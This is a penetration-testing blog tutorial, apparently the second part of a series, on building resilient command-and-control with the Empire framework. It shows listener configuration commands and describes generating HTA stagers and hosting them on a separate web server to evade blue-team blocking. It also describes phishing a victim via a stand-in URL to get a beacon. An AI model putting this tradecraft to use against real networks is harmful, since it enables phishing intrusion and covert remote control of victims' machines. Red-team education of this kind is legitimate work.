In Part One we went over the reasons for having a resilient C2 infrastructure, and what it should look like. In summary, we want to have two or more internet accessible servers to host the different stages and classes of our Command and Control (C2). A host to store our short launcher scripts and files, and one or more hosts to act as C2. More control hosts for added resiliency and for enabling long-term control. The reason for this is primarily evasion of an active blue team.
Assumptions: You know how to move around in Linux on the CLI and move files from one server to another via SCP or SFTP.
Let’s get started.
Login to your C2 server’s CLI and start Empire:
$ sudo ./empire
Empire needs to be run as a superuser in order to bind to port 443.
With Empire up and running we need to configure a listener. For my engagements I like to configure a kill date in case something goes awry and the agent is unable to receive a manual kill command. This is good tradecraft.
(Empire) set Name primaryC2
(Empire) set KillDate 06/12/2016
(Empire) set CertPath /home/user/Empire/data/empire.pem
(Empire) set Host https://commandcontrol1.com
use “info” to verify your settings and then, “execute” to start the listener.
Now that our listener is set up, it’s time to create some stagers.
In Empire 1.5, we have dll, ducky, hop_php, hta, launcher, launcher_bat, launcher_vbs, macro, pth_wmis, stager, and war as our options. In the Empire Dev branch is a stager for the RegSrv32 .sct “hack” (via @subtee for this badass find), a personal favorite of mine.
For this demonstration we will be using the hta launcher as an example. Here’s a great write-up on how you would expand this to a phishing campaign.
Once you’ve configured all of your stagers we need to move some (or all) to our web host. I chose to tar-zip the files and scp them. This is done from either a different screen/tmux window, or another login shell.
Then copy the stagers.tgz to the webroot of your web server or a sub-folder if you choose.
Make sure you chown those files to www-data or that they are readable by www-data. Hosting your stagers here gives you access to them from potentially any asset in the client network (assuming non-whitelisted policies). It also gives you a separate location for your C2 should incident responders discover any of your initial stagers and the URL they are being pulled from. This would be critical if your phishing campaign was discovered and the initial web server blocked.
The attack setup looks something like this:
Once you get a victim to click on http://totallynotphish.com/spreadsheet.hta and they click through the warning you’ll receive your beacon from Empire:
In a follow up post I’ll explain how to add a third server to this setup, with a bonus of passing yourself a meterpreter shell.
My aim here is to educate and hopefully cause some people to think about the broader implications of their actions and inactions. Whether you're white, grey, black, blue, purple, red, or something more rainbow colored, I hope you walk away learning something new.